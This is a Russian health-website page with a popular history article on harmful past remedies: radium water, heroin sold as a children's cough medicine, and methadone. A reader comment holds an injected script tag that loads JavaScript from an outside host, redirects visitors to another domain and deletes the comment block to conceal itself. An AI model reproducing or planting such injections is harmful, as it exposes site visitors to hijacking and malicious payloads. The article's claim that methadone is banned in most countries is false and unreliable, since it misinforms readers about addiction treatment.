Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лекарства от незнания  >>  Лекарства от незнания
 
Обратная связь
 

Лекарства от незнания

Размер шрифта
06 августа 2011 07:00
  • google_analytics: false
  • Нравится

На минувшей неделе в Швеции был задержан мужчина, который собрал на своей кухне действующий ядерный реактор. Реактор полицейские конфисковали от греха подальше, все-таки опасность радиации – факт очевидный. Но еще не так давно радиации не просто не боялись – ею лечились. Также как и некоторыми другими препаратами, которые сегодня никак не воспринимаются в качестве фармакологических.

Опасные лекарства

Евгений Бузев / «Здоровье инфо»

Целебные лучи

Открытие радиации произвело настоящий фурор не только в науке, но и в массовом сознании. Еще не построили первые ядерные реакторы, а атомное оружие было недостижимой мечтой, когда о полезных медицинских свойствах радиоактивных материалов заговорил весь мир. В общем-то радиотерапия действительно существует, однако применяется она в основном для лечения онкологических заболеваний.

А в начале ХХ века, когда радиацию уже поставили на службу человеку (научившись использовать рентген), ей пытались лечить практически от всего, потому что ее негативные эффекты были еще слишком плохо изучены.

Торжественное шествие «лечебной радиации» по миру началось в 1913 году, когда был открыт эффективный метод извлечения радия из урановой руды. В те годы промышленность быстро освоила выпуск солей и добавок для ванн. Предполагалось, что такие ванны способствуют улучшению здоровья. Производители утверждали, что вся «лишняя» радиация выводится из организма с потом и мочой, и вообще, чем больше радия применяется, тем лучше.

Подоспела и фармакология, которая вывела на рынок целый комплекс таблеток и порошков с содержанием радия. Популярная в 1920-е годы жидкость «Радитор» представляла собой радиоактивную воду и считалась мощным общеукрепляющим средством, до тех пор, пока в 1932 году не случился конфуз. Известный американский промышленник Эбен Байер так приналег на чудесное средство, что умер от радиационного отравления. Медики обнаружили в его организме дозу радия, в три раза превышающую смертельную.

Ревигатор

Ревигатор заполнялся радиоактивной рудой для «зарядки» воды радиацией. Фото: goodreads.com

Это стало первым громким скандалом, но радиоактивные материалы продолжали использоваться в медицине до самого 1945 года, пока в результате Хиросимы радиомания не сменилась на радиофобию. Так, в Германии выпускалась отбеливающая зубная паста «Дорамат», имевшая в своем составе торий, а в тех же США продавался аппарат «Ревигатор» для «зарядки» воды радиацией. В нем содержались радон, уран, ванадий и, видимо для полного набора, мышьяк.

О пользе уколов

Немного раньше тех памятных времен, когда на радиацию смотрели как на панацею, на свет появилось еще одно лекарство, правда, более узкого профиля.

Поначалу никто не придал значения появлению на прилавках европейских аптек нового средства от детского кашля. Мало ли их продается, в разных упаковках и с разными названиями. Однако названию именно этого препарата было суждено войти в историю.

Детское лекарство «Героин» очень быстро вызвало беспокойство родителей. Очень уж странные у него были побочные эффекты. За изучение загадочного препарата от кашля взялись наркологи, и вскоре героин стали применять в качестве препарата для лечения морфиновой зависимости. Можно представить, как приободрились морфиновые наркоманы тех лет, когда им стали прописывать чистейший героин, синтезированный в лабораториях фармацевтических магнатов. Кстати, интересно, что изначально права на название «Героин» принадлежали известной корпорации «Байер», однако она их потеряла по результатам Первой мировой войны («Байер», как и все крупные германские компании, была вынуждена расплачиваться за поражение своей страны).

1

Гидрохлорид героина производства корпорации «Байер». Фото: history.msu.edu

К середине 1920-х гг. стало ясно, что лечить морфиновую зависимость героином – это то же самое, что тушить пожар бензином. Специальное постановление по героину (с призывом ограничить его распространение) принял тогдашний аналог ООН – Лига Наций. Уже к 1930 году в большинстве стран мира героин был повсеместно запрещен, хотя в некоторых уголках мира он продолжал свободно продаваться до 1970-х гг.

Однако история, как известно, повторяется два раза. В результате Второй мировой войны страны-победительницы получили немалые трофеи и репарации. В числе прочего США достался патент на экспериментальный немецкий анальгетик, который в 1947 году появился на рынке под названием «Метадон». Вскоре выяснилось, что это обезболивающее эффективно снимает синдром абстиненции (ломку) у героиновых наркоманов. Американские ученые заговорили о том, что найдено спасение от героина. Метадоновая терапия быстро распространилась по миру (добралась она и до России, в 1990-е).

Итог, как известно, оказался печален. Наркоманы попросту «пересаживались» с героина на метадон. Сейчас в большинстве стран мира метадон признан опасным наркотиком и запрещен к распространению.

Не все то золото

Это только несколько примеров того, как люди использовали заведомо вредные вещества в медицинских целях. Хотя и в те годы было известно, что эти препараты еще не до конца исследованы, что все возможные влияния этих средств на человеческий организм еще предстоит изучить. Но тягу коммерсантов от фармакологии к наживе было не унять, как и постоянный поиск новой надежды у отчаявшихся больных. Итогом стал негативный опыт и потерянное здоровье (иногда вместе с жизнью) у тысяч людей.

И сегодня стоит хорошо задуматься, прежде чем покупать какие-нибудь БАДы, «акватитановые ожерелья» или идти на прием к заезжему «революционеру от медицины». Как бы вас не уверяли, что новые методы действенны, а одобрение их научным сообществом – дело ближайшего будущего, стоит помнить, что героин когда-то продавали без рецепта детям.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Этот продукт защитит вас от радиации   Березовый сок поможет ранам зажить   Ученые обнаружили причину самого частого женского заболевания   Уроки Фукусимы  

Слайдшоу

Вы не правильно красите ресницы! Как надо?    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.